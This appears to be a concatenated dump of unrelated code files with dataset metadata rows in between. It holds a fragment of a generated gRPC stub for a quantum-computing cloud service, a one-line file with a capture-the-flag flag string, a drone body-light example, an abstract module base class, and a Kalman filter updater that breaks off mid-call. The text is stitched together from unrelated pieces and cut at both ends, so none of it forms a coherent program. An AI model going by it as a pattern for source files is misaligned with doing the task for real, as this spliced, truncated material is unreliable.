request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProcessorRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProcessor.FromString,
)
self.ListQuantumCalibrations = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumCalibrations',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsResponse.FromString,
)
self.GetQuantumCalibration = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumCalibration',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumCalibrationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumCalibration.FromString,
)
self.CreateQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CreateQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.CancelQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CancelQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.DeleteQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/DeleteQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GetQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.ListQuantumReservations = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumReservations',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsResponse.FromString,
)
self.UpdateQuantumReservation = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/UpdateQuantumReservation',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumReservationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.FromString,
)
self.QuantumRunStream = channel.stream_stream(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/QuantumRunStream',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamResponse.FromString,
)
self.ListQuantumReservationGrants = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumReservationGrants',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsResponse.FromString,
)
self.ReallocateQuantumReservationGrant = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ReallocateQuantumReservationGrant',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ReallocateQuantumReservationGrantRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservationGrant.FromString,
)
self.ListQuantumReservationBudgets = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumReservationBudgets',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsResponse.FromString,
)
self.ListQuantumTimeSlots = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumTimeSlots',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsResponse.FromString,
)
class QuantumEngineServiceServicer(object):
"""-
-
"""
def CreateQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumPrograms(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateQuantumProgram(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumJobs(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CancelQuantumJob(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumJobEvents(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumResult(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumProcessors(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumProcessor(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumCalibrations(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumCalibration(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CancelQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumReservations(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateQuantumReservation(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def QuantumRunStream(self, request_iterator, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumReservationGrants(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ReallocateQuantumReservationGrant(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumReservationBudgets(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListQuantumTimeSlots(self, request, context):
"""-"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_QuantumEngineServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.CreateQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumProgramRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.SerializeToString,
),
'GetQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProgramRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.SerializeToString,
),
'ListQuantumPrograms': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumPrograms,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsResponse.SerializeToString,
),
'DeleteQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.DeleteQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumProgramRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'UpdateQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.UpdateQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumProgramRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.SerializeToString,
),
'CreateQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.CreateQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumJobRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.SerializeToString,
),
'GetQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumJobRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.SerializeToString,
),
'ListQuantumJobs': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumJobs,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsResponse.SerializeToString,
),
'DeleteQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.DeleteQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumJobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'UpdateQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.UpdateQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumJobRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.SerializeToString,
),
'CancelQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.CancelQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumJobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ListQuantumJobEvents': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumJobEvents,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsResponse.SerializeToString,
),
'GetQuantumResult': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumResult,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumResultRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumResult.SerializeToString,
),
'ListQuantumProcessors': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumProcessors,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsResponse.SerializeToString,
),
'GetQuantumProcessor': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumProcessor,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProcessorRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProcessor.SerializeToString,
),
'ListQuantumCalibrations': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumCalibrations,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsResponse.SerializeToString,
),
'GetQuantumCalibration': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumCalibration,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumCalibrationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumCalibration.SerializeToString,
),
'CreateQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.CreateQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'CancelQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.CancelQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'DeleteQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.DeleteQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumReservationRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GetQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'ListQuantumReservations': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumReservations,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsResponse.SerializeToString,
),
'UpdateQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.UpdateQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'QuantumRunStream': grpc.stream_stream_rpc_method_handler(
servicer.QuantumRunStream,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamResponse.SerializeToString,
),
'ListQuantumReservationGrants': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumReservationGrants,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsResponse.SerializeToString,
),
'ReallocateQuantumReservationGrant': grpc.unary_unary_rpc_method_handler(
servicer.ReallocateQuantumReservationGrant,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ReallocateQuantumReservationGrantRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservationGrant.SerializeToString,
),
'ListQuantumReservationBudgets': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumReservationBudgets,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsResponse.SerializeToString,
),
'ListQuantumTimeSlots': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumTimeSlots,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.cloud.quantum.v1alpha1.QuantumEngineService', rpc_method_handlers
)
server.add_generic_rpc_handlers((generic_handler,))
| 63.075665
| 155
| 0.779179
| 2,937
| 30,844
| 7.617978
| 0.046987
| 0.091848
| 0.066327
| 0.08054
| 0.830294
| 0.826182
| 0.824931
| 0.779074
| 0.703048
| 0.6984
| 0
| 0.015083
| 0.157373
| 30,844
| 488
| 156
| 63.204918
| 0.845787
| 0.005868
| 0
| 0.346341
| 1
| 0
| 0.129399
| 0.077961
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.009756
| 0
| 0.087805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4491be1bb7fb7c012de5512d687381c456a0285e
| 47
|
py
|
Python
|
Crypto-easyRSA/flag.py
|
JSW2020/hsctf-2019-freshmen
|
5282d6d51153aadd62f42673aa3d487f8d7ef45b
|
[
"MIT"
] | 16
|
2019-12-09T15:53:08.000Z
|
2021-12-07T00:34:30.000Z
|
Crypto-easyRSA/flag.py
|
JSW2020/hsctf-2019-freshmen
|
5282d6d51153aadd62f42673aa3d487f8d7ef45b
|
[
"MIT"
] | null | null | null |
Crypto-easyRSA/flag.py
|
JSW2020/hsctf-2019-freshmen
|
5282d6d51153aadd62f42673aa3d487f8d7ef45b
|
[
"MIT"
] | 7
|
2019-12-09T11:53:52.000Z
|
2021-11-14T04:09:04.000Z
|
flag = 'flag{a9f82b70bda82070bdefadad4bb1c2d0}'
| 47
| 47
| 0.851064
| 3
| 47
| 13.333333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.311111
| 0.042553
| 47
| 1
| 47
| 47
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0.791667
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
924c682945b67d2c52f37b2f277e6ff2930b5582
| 2,173
|
py
|
Python
|
10_light/eg_10_02_light_manual_color_flag.py
|
byrobot-python/e_drone_examples
|
fca3ef69f45299f0e80df52ac303e2a1388b2b61
|
[
"MIT"
] | null | null | null |
10_light/eg_10_02_light_manual_color_flag.py
|
byrobot-python/e_drone_examples
|
fca3ef69f45299f0e80df52ac303e2a1388b2b61
|
[
"MIT"
] | null | null | null |
10_light/eg_10_02_light_manual_color_flag.py
|
byrobot-python/e_drone_examples
|
fca3ef69f45299f0e80df52ac303e2a1388b2b61
|
[
"MIT"
] | null | null | null |
# Example: manually step the body-light brightness on both the controller
# and the drone, one colour at a time (dim -> bright -> off, 1 s apart).
# NOTE(review): 'random' appears unused here — kept to avoid changing
# module-level imports.
import random
from time import sleep
from e_drone.drone import *
from e_drone.protocol import *

if __name__ == '__main__':
    drone = Drone()
    drone.open()

    # Start from a known state: controller body light flags set, brightness 0.
    drone.send_light_manual(DeviceType.CONTROLLER, 0xFF, 0)
    sleep(1)

    # Same dim/bright/off sweep for every (device, colour-flag) pair, in the
    # same order as the original hand-unrolled sequence.
    targets = [
        (DeviceType.CONTROLLER, LightFlagsController.BODY_RED.value),
        (DeviceType.CONTROLLER, LightFlagsController.BODY_GREEN.value),
        (DeviceType.CONTROLLER, LightFlagsController.BODY_BLUE.value),
        (DeviceType.DRONE, LightFlagsDrone.BODY_RED.value),
        (DeviceType.DRONE, LightFlagsDrone.BODY_GREEN.value),
        (DeviceType.DRONE, LightFlagsDrone.BODY_BLUE.value),
    ]
    for device, flags in targets:
        for brightness in (10, 100, 0):
            drone.send_light_manual(device, flags, brightness)
            sleep(1)

    drone.close()
| 54.325
| 109
| 0.736309
| 269
| 2,173
| 5.702602
| 0.111524
| 0.111473
| 0.173403
| 0.247718
| 0.925684
| 0.925684
| 0.899609
| 0.891786
| 0.891786
| 0.891786
| 0
| 0.03125
| 0.160607
| 2,173
| 40
| 110
| 54.325
| 0.809759
| 0
| 0
| 0
| 0
| 0
| 0.003747
| 0
| 0
| 0
| 0.001874
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
926680b7bf49888029c1cffbb51cd5a14959195c
| 1,473
|
py
|
Python
|
aqopa/module/__init__.py
|
lukaszkurantdev/AQoPA
|
997d8a16a07050781d5d4df0e18c0a4337eb815c
|
[
"BSD-3-Clause"
] | 2
|
2016-06-10T19:58:02.000Z
|
2020-04-08T17:32:05.000Z
|
aqopa/module/__init__.py
|
lukaszkurantdev/AQoPA
|
997d8a16a07050781d5d4df0e18c0a4337eb815c
|
[
"BSD-3-Clause"
] | null | null | null |
aqopa/module/__init__.py
|
lukaszkurantdev/AQoPA
|
997d8a16a07050781d5d4df0e18c0a4337eb815c
|
[
"BSD-3-Clause"
] | 2
|
2015-05-07T08:02:07.000Z
|
2021-02-14T10:55:09.000Z
|
# Abstract module base
class Module:
    """Base class describing the interface every AQoPA module implements.

    Subclasses override the hooks below; the defaults are no-ops that
    simply hand back whatever they were given.
    """

    def get_gui(self):
        """Return the class used by the GUI version of AQoPA (``None`` here)."""
        return None

    def extend_model_parser(self, parser):
        """Hook called before the qopml model file is parsed.

        A module may add tokens, rules, etc. to ``parser``; the (possibly
        extended) parser is returned.
        """
        return parser

    def extend_metrics_parser(self, parser):
        """Hook called before the qopml metrics file is parsed.

        A module may add tokens, rules, etc. to ``parser``; the (possibly
        extended) parser is returned.
        """
        return parser

    def extend_config_parser(self, parser):
        """Hook called before the qopml config file is parsed.

        A module may add tokens, rules, etc. to ``parser``; the (possibly
        extended) parser is returned.
        """
        return parser

    def install_console(self, simulator):
        """Hook called before running a simulation in console mode.

        The module installs itself (hooks, executors, etc.) in ``simulator``
        and returns it.
        """
        return simulator

    def install_gui(self, simulator):
        """Hook called before running a simulation in GUI mode.

        The module installs itself (hooks, executors, etc.) in ``simulator``
        and returns it.
        """
        return simulator
| 28.326923
| 67
| 0.592668
| 166
| 1,473
| 5.204819
| 0.289157
| 0.046296
| 0.081019
| 0.115741
| 0.770833
| 0.770833
| 0.770833
| 0.770833
| 0.770833
| 0.650463
| 0
| 0
| 0.342838
| 1,473
| 52
| 68
| 28.326923
| 0.892562
| 0.517312
| 0
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.461538
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
929cccf3860d36321dfd4c89394869f09f1084e0
| 34,454
|
py
|
Python
|
stonesoup/updater/kalman.py
|
GSORF/Stone-Soup
|
0aa730929fa6a1630a5279516c3377867e49b9b9
|
[
"MIT"
] | 1
|
2021-04-13T11:47:42.000Z
|
2021-04-13T11:47:42.000Z
|
stonesoup/updater/kalman.py
|
GSORF/Stone-Soup
|
0aa730929fa6a1630a5279516c3377867e49b9b9
|
[
"MIT"
] | null | null | null |
stonesoup/updater/kalman.py
|
GSORF/Stone-Soup
|
0aa730929fa6a1630a5279516c3377867e49b9b9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
from functools import lru_cache
from .base import Updater
from ..base import Property
from ..types.hypothesis import SingleHypothesis
from ..types.prediction import GaussianMeasurementPrediction
from ..types.update import GaussianStateUpdate
from ..functions import gauss2sigma, unscented_transform
class KalmanUpdater(Updater):
    """Simple Kalman Updater

    Perform measurement update step in the standard Kalman Filter.
    """

    # NOTE(review): lru_cache on an instance method keys on `self` and keeps
    # every instance alive for the cache's lifetime — confirm intentional.
    @lru_cache()
    def get_measurement_prediction(self, state_prediction,
                                   measurement_model=None, **kwargs):
        """Kalman Filter measurement prediction step

        Parameters
        ----------
        state_prediction : :class:`~.GaussianStatePrediction`
            A predicted state object
        measurement_model: :class:`~.MeasurementModel`, optional
            The measurement model used to generate the measurement prediction.\
            Should be used in cases where the measurement model is dependent\
            on the received measurement.\
            (the default is ``None``, in which case the updater will use the\
            measurement model specified on initialisation)

        Returns
        -------
        : :class:`~.GaussianMeasurementPrediction`
            The measurement prediction
        """
        # Measurement model parameters: fall back to the model configured on
        # the updater when none is supplied.
        if measurement_model is None:
            measurement_model = self.measurement_model

        measurement_matrix, measurement_noise_covar = \
            self._extract_model_parameters(measurement_model)

        meas_pred_mean, meas_pred_covar, cross_covar = \
            self.get_measurement_prediction_lowlevel(state_prediction.mean,
